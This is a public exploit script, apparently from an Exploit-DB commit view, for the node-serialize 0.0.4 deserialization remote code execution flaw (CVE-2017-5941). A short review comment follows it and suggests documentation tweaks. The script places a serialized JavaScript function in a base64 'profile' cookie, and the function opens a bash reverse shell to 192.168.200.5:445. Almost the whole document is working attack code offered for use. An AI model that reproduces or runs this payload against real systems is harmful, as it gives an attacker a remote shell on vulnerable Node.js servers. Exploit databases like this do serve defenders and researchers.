
3 changes to exploits/shellcodes b2evolution 6.11.6 - 'plugin name' Stored XSS Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
|
|
# Exploit Author: UndeadLarva
|
|
# Software Link: https://www.npmjs.com/package/node-serialize
|
|
# Version: 0.0.4
|
|
# CVE: CVE-2017-5941
|
|
|
|
import requests
|
|
import re
|
|
import base64
|
|
import sys
|
|
|
|
url = 'http://192.168.100.133:8000/' # change this
|
|
|
|
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
|
|
"return function () {"
|
|
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
|
|
"console.log('still inside');"
|
|
"const { exec } = require('child_process');"
|
|
"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
|
|
"}"
|
|
"})(require('http').ServerResponse.prototype.end)")
|
|
|
|
# rce = "_$$ND_FUNC$$_process.exit(0)"
|
|
# code ="_$$ND_FUNC$$_console.log('behind you')"
|
|
code = "_$$ND_FUNC$$_" + payload
|
|
|
|
string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
|
|
|
|
cookie = {'profile':base64.b64encode(string)}
|
|
|
|
try:
|
|
response = requests.get(url, cookies=cookie).text
|
|
print response
|
|
except requests.exceptions.RequestException as e:
|
|
print('Oops!')
|
|
sys.exit(1) |
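Review bot: The script only runs under Python 2 — `print response` is a print statement, and `base64.b64encode(string)` is handed a `str`, which Python 3 rejects — yet the header block (`# Exploit Title:` through `# CVE:`) never states an interpreter, so a reader cannot tell which version the author ran. Add a line such as `# Tested on: Python 2.7` (whichever the author actually used) below `# Version: 0.0.4`, and make that line say it is the node-serialize package version rather than the script's. The two `# change this` markers are the only inline documentation; a one-line comment above `url = ...` saying what both values denote would save the next reader from inferring it.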